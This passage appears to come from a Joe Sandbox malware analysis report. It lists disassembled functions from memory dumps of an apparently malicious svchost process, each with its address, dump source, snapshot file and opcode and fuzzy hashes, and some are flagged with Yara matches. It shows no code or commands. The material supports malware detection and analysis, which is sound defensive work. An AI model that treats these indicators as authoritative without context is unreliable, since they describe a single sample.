                                          • Opcode Fuzzy Hash: b166827137602c44fa51ac4aea1a1465eaec3724278c277d83401e947cc95345
                                          • Instruction Fuzzy Hash: B731F236A10215AFD714DF29CD44AABBBEAEF8D350F448468FA08CF241DA34E901C794
                                          Function 0040DBE3 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                          • Instruction ID: 7ccf6c840a25cc97cafa583213c8c98f4b2ff391b799f806102a57f671d5675b
                                          • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                          • Instruction Fuzzy Hash: 7E31625165C6F14DD31E436D08BD675AEC18E9720174EC2FEDADA6F2F3C4988408D3A5
                                          Function 036402E1 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction ID: 71a6d67ebdf680cf3c1c9f2f8117f5b5dff19ea1a3f197bee210b762d9bacffe
                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction Fuzzy Hash: 55314632E04254AFDB22DB68CC40B9AFFE8FF05310F0885AAE815DB351D6749885CBA4
                                          Function 03659274 Relevance: .1, Instructions: 105COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7d4ca5ea89d3dc41ff486a0cdbb88306fc2e98176bd7c67868c48e475653b4c
                                          • Instruction ID: 07847718598e04e8339a750287767f07e2b49c445f40e67cf8e9e94f8f277898
                                          • Opcode Fuzzy Hash: c7d4ca5ea89d3dc41ff486a0cdbb88306fc2e98176bd7c67868c48e475653b4c
                                          • Instruction Fuzzy Hash: D3315075A00328EFDB25DB24CC40B9AB7B9EF86710F5501A9B94DAB280DB309E45CB95
                                          Function 03635702 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d376ed4d6ea837d79d819f1f5a473c7a13673cb0df71f63fb4d0aa89d32ed84
                                          • Instruction ID: 864fa255551eae5ba7f9aa9e63d4fbc85ad4cd71ae6461eb2d6fc905b442eeab
                                          • Opcode Fuzzy Hash: 8d376ed4d6ea837d79d819f1f5a473c7a13673cb0df71f63fb4d0aa89d32ed84
                                          • Instruction Fuzzy Hash: 3131AE35701A06EFDB51DB24CA84AA9FBB9BF46354F045069EA428BB50DB70E821CBD0
                                          Function 03634260 Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80ff27fd3bce9331222c949b33cd466a6c2fb83aa8dff8acf64ba847be10ebf1
                                          • Instruction ID: 400bdc7c8cd4f2900dd224aadb92f119e71fe95772b27eb1c854287ad4ff5913
                                          • Opcode Fuzzy Hash: 80ff27fd3bce9331222c949b33cd466a6c2fb83aa8dff8acf64ba847be10ebf1
                                          • Instruction Fuzzy Hash: 1A419F35200B45DFDB22DF25C981BD6BBE9AF46714F14842EE59A8F350CB74E804CB94
                                          Function 036550E4 Relevance: .1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                          • Instruction ID: f9b394f749e9ed18dcfca74dd1417386c22b9788c74fdc152c63fd15dc16c0b5
                                          • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                          • Instruction Fuzzy Hash: 1031D4316083419BDB31DA28C904767BEA9AB86754F0C857EFE878B385D674D841C792
                                          Function 036F61C3 Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1bee867120131c845fd1ced90d4ff23a686bb015986df51b6c3f3c4c637090ea
                                          • Instruction ID: ced5efbfd359d9a295c5873b8a0881cb61175a1064dfacb4dc7b8381900af436
                                          • Opcode Fuzzy Hash: 1bee867120131c845fd1ced90d4ff23a686bb015986df51b6c3f3c4c637090ea
                                          • Instruction Fuzzy Hash: BF31B276A00215EFDB15DFA8CD44BAEB7B5FB44740F454169E500AB244D774ED01CBA8
                                          Function 03629730 Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7cebd6000d66b6e2583145ea99ce1f9b199878e5d8c6c694a766d0d43a5fab1b
                                          • Instruction ID: e1e2340a3410421f8dd8261a6f8251a094379bdbec9ef6e6850f55ce31c32d8c
                                          • Opcode Fuzzy Hash: 7cebd6000d66b6e2583145ea99ce1f9b199878e5d8c6c694a766d0d43a5fab1b
                                          • Instruction Fuzzy Hash: E221AF7AA00B24AFD322EF588804B5ABFF5FBC8B54F160469EA559B341D774E811CB90
                                          Function 036F6BD7 Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a64fb45376e1bb725fa96dad7db02a88e94aa1ce8f340a5d9d75c24d5d09b6bd
                                          • Instruction ID: 58cc671dcf3785253f7e21099107cb92389bd0b7945cedb4e481f2fa8749abae
                                          • Opcode Fuzzy Hash: a64fb45376e1bb725fa96dad7db02a88e94aa1ce8f340a5d9d75c24d5d09b6bd
                                          • Instruction Fuzzy Hash: 06316C316002049FCB24DF2AD985A9B7BF4FF4D340B858469E908DF24AD670E945CBA4
                                          Function 036F60B8 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4459a0f7ceb5672f98aa34bf28ff158abaa6c78d8af5ae1f91041e06ee757332
                                          • Instruction ID: 9bd2d3a09d0131745696f18972d9d2716102402659dda2ede146736186cbc0a7
                                          • Opcode Fuzzy Hash: 4459a0f7ceb5672f98aa34bf28ff158abaa6c78d8af5ae1f91041e06ee757332
                                          • Instruction Fuzzy Hash: 6631E075B00215AFDB22EBA9C950B6EBFB9AB44314F1440ADE641EB342DA30DC018B90
                                          Function 036307AF Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8f3c38ac00e96ae4ce541b08c3c244ca9298a7d091460686ec9458eb67c988b
                                          • Instruction ID: d889fedf21ba9480ae87dc92ff31182635a91622974fb1316494510db0a45cdc
                                          • Opcode Fuzzy Hash: e8f3c38ac00e96ae4ce541b08c3c244ca9298a7d091460686ec9458eb67c988b
                                          • Instruction Fuzzy Hash: FD31D776A04751DBCB11EF248880E6BBBA9EF86660F06452DFC579B310DB30DC1987D5
                                          Function 0042E753 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6894f1fb6386936e8b19238c31d6ee1cd2bbb2ae1d36ba972f871af51a71fae3
                                          • Instruction ID: b26fb8f1ddad9cc402754325ebcaaf3f7c86742985a79092b29cf01fccb9d548
                                          • Opcode Fuzzy Hash: 6894f1fb6386936e8b19238c31d6ee1cd2bbb2ae1d36ba972f871af51a71fae3
                                          • Instruction Fuzzy Hash: 7D31D176B106265BD354CE3AD880256F7E5FBC8310754863AC918C3B80E778F962CBD4
                                          Function 0362D6AA Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                          • Instruction ID: 8201191b22ca0430c3be198f3718c428a31169d06596c3ccec97cabf4c79b354
                                          • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                          • Instruction Fuzzy Hash: 9231C536A00E24AFDB21DE54CA88B6ABBB9DB84750F1E8469ED259B350D338DD41CF50
                                          Function 00403060 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 603e272df0d4c7da7bf9d41587d229942aececa0d917f25a29107d4f6c9c32ac
                                          • Instruction ID: ec0983ab15dac49bfad251e1f52606c85e851f884c191eaf8f843229c8f765a1
                                          • Opcode Fuzzy Hash: 603e272df0d4c7da7bf9d41587d229942aececa0d917f25a29107d4f6c9c32ac
                                          • Instruction Fuzzy Hash: 0331C272B10A108FD368CE6AD841607B7E5EB88350B418A3EE89DD7780D678E901CB84
                                          Function 036357C0 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00e8d71cf2be50e93405d714a0cb42b90ceabd5393882e4078d172d4ad9cc9c3
                                          • Instruction ID: 0cb04671c39df379e6d09794981bb0e6cfca1c204bd3392ba2bc5c2c3749e92c
                                          • Opcode Fuzzy Hash: 00e8d71cf2be50e93405d714a0cb42b90ceabd5393882e4078d172d4ad9cc9c3
                                          • Instruction Fuzzy Hash: 9C319239715A09FFDB51DB24DB44AA9BBAAFF46310F54506AE9028BB50D731E831CBC0
                                          Function 0366A6C7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction ID: 1d54de1acf0eca5360f867f49c80eb1d2371359ee03901e61c999fbe9a6a3572
                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction Fuzzy Hash: 6A310FB6B00B01AFD764CF69DE45B57BBF8BB08690F18452DA59AD3750E630E900CB64
                                          Function 0365438F Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0441c3a238080520459250624a605412036bbadbfd2534a6d172fdee32ce4ecd
                                          • Instruction ID: cdf82f82e0727f945692e2908a2c4f3689bb5230f0ea9846403e84b49d9f5a77
                                          • Opcode Fuzzy Hash: 0441c3a238080520459250624a605412036bbadbfd2534a6d172fdee32ce4ecd
                                          • Instruction Fuzzy Hash: CC31D631B003059FDB21EFA9C980A6FB7F9EB84305F00857AE845D7254DB30E985CBA0
                                          Function 036392C5 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                          • Instruction ID: cac8d83aa08e1b49880c9c8018781a24649a2448298b687a247937402bf52094
                                          • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                          • Instruction Fuzzy Hash: 1F319CB56083099FDB01DF18D940A9ABBE9FF89310F04096AF8519B3A0D730DC15CBA6
                                          Function 03687190 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                          • Instruction ID: f31aa4fac2b259c1e62ec93dcf1578a7dc8e7ab6166ef008b628589629761313
                                          • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                          • Instruction Fuzzy Hash: 71318A75604206CFC710CF18C580956FBF5FF8D350B2986A9E9989B325EB30ED06CB91
                                          Function 036EC3CD Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction ID: caff551f300f700a89024828975f6dd61dadb9ef4dc3b67a18d2c364f0a896f7
                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction Fuzzy Hash: 0321083F601755AACB25EBA58800ABEF7B4EF40610F40801EFDA68B691E634D954C774
                                          Function 0362C156 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                          • Instruction ID: c19ae07faeaaa4c241daf3b67227c2f46200cb3c9878d651d0c6d7e2938b0a96
                                          • Opcode Fuzzy Hash: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                          • Instruction Fuzzy Hash: F931E5755003108BDB34FF24C845BA9BBB8AF45314F5882ADD9469F3C1DA749986CBA4
                                          Function 037003E6 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                          • Instruction ID: 132c2408ac0f4465ec540a8d11c6b1ef10cc522ef4f4c2316f79199d36bd1674
                                          • Opcode Fuzzy Hash: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                          • Instruction Fuzzy Hash: CF313E71A00119EBCB18DBA5D898F9FBBB9FB8D214F454169E905E7241DB30AE04CBA4
                                          Function 0362E388 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction ID: 45bddeec9d56b6027aad9540e24f39243b4fc3894dd3fbabdcdd04d9166e5cfe
                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction Fuzzy Hash: DB31A935600A14EFDB21DF68C984F6ABBF8EF84354F1545A9E5128B390E730EE02CB60
                                          Function 036AE609 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                          • Instruction ID: bb1f0d6ccf6016fff85e9d0a096afdc314d4fccf84c1a5a266b88627b94534b4
                                          • Opcode Fuzzy Hash: 5a1488e139124588e49a482fe9cb6ab02ae82e63c10556d035c69d3b1d4d2118
                                          • Instruction Fuzzy Hash: E1316D75A00605DFCB14CF1CC984DAEB7B5EF88304B15895AE8059B391E772EE61CF94
                                          Function 03633616 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                          • Instruction ID: cfa31418923293abc369ac92ae038b7722c01b57bf94478eae1a415d150f794e
                                          • Opcode Fuzzy Hash: 58dcaef159e4288099b50cfc97d7db574937aeb7fcef4f6eda0e4234b536d67e
                                          • Instruction Fuzzy Hash: 2C21F2392457609FCB61EF04CA58B2ABBA4FF83B10F29486DE9410B751C7B0E854CB91
                                          Function 03700591 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                          • Instruction ID: 691291992e3dd7008a497aa4083e01a13afd145ab27b45a863d75e133f53679b
                                          • Opcode Fuzzy Hash: 2d27681a8c565a9b783fe6ed71702170c09da9cb81127b10cb3d31315d9ddcb6
                                          • Instruction Fuzzy Hash: C1218B32614205CFD728CE29D880BAAB7E6EFD4320F998478E915DB2C5DB74F855CB90
                                          Function 0365F32A Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                          • Instruction ID: db17d7b879803c4a79718cb7173ae3a8f87680c043f2676902b0746ffbdeed96
                                          • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                          • Instruction Fuzzy Hash: 99217972200700DFD719DF15C545B6ABBE9EF95365F15817DE90A8F3A0EBB0A801CAA8
                                          Function 036B06F1 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                          • Instruction ID: ecba113edbea4c97ffabbc53a7484993dea8aa255be3e438755b1d7d06ca5260
                                          • Opcode Fuzzy Hash: c26d4f4ec19aec5025eb50faf0da88b1cb84877905d3e1d85d469d109d1139a3
                                          • Instruction Fuzzy Hash: 3E21AD75A00229ABCF20DF59C881ABEFBF8FF49740B540069E541AB240D778AD42CFA4
                                          Function 036B019F Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                          • Instruction ID: 8812e70f154a6ac0dde641ab8ecda89f1512202ac7c2d5cf03842ea5f8320859
                                          • Opcode Fuzzy Hash: 2b4811e943bdf3fc03344e573d3725470c32d39519d85b88e566411c8c546045
                                          • Instruction Fuzzy Hash: 4921AE75A00644AFC715DBA8C940FAABBB8FF48740F140069F944DB7A1D734ED50CBA8
                                          Function 03669660 Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                          • Instruction ID: 7c8507317813c41c3db950788b07291fdcea242b68be1ae0ee61f933e6fead70
                                          • Opcode Fuzzy Hash: 1f71265f7cde3c099c0f100f119c9e662f656e8535d0d4040279d83c450222d3
                                          • Instruction Fuzzy Hash: 6921F330100B01DBEF31EB24CA10B2677E6EB41364F18465AED92CA7A0D731AC62DF55
                                          Function 036B0283 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                          • Instruction ID: 6aa627503e46fa8fe4d7221dec95c0d75cb66edc1ef9eb722e4fa7233f9b145f
                                          • Opcode Fuzzy Hash: b2c6c8be19fbff6f0f592a74bc9b25541a1cdc93e28366fc7ea87ecc3c48f6b9
                                          • Instruction Fuzzy Hash: AD21B6769043469BC711EF59C948B9BFBECBF81240F08445ABD80CB351D734D989CBA5
                                          Function 036AD0C0 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                          • Instruction ID: 832f59bdba189dcd17484622e88c6781ccb14e59f933afa52ac9f30a47815be2
                                          • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                          • Instruction Fuzzy Hash: 0321B072644B00ABD311DE1CCC51B5ABBA4EB89720F14052EF9459B7A0D730DD018BA9
                                          Function 037001AA Relevance: .1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                          • Instruction ID: ac33395f31e7ffe21da3d40b559f3aa9079ca44f8bd5e27777a296092684a14d
                                          • Opcode Fuzzy Hash: db6dc73fa20726821c8ef2134f69c9d3cc6227f3587657448270833cb3061308
                                          • Instruction Fuzzy Hash: F521E4612142504FD745CB1AA8B54B7BFE5EFC6125B09C2E6D884CB346C134D907C7B0
                                          Function 0366A30B Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
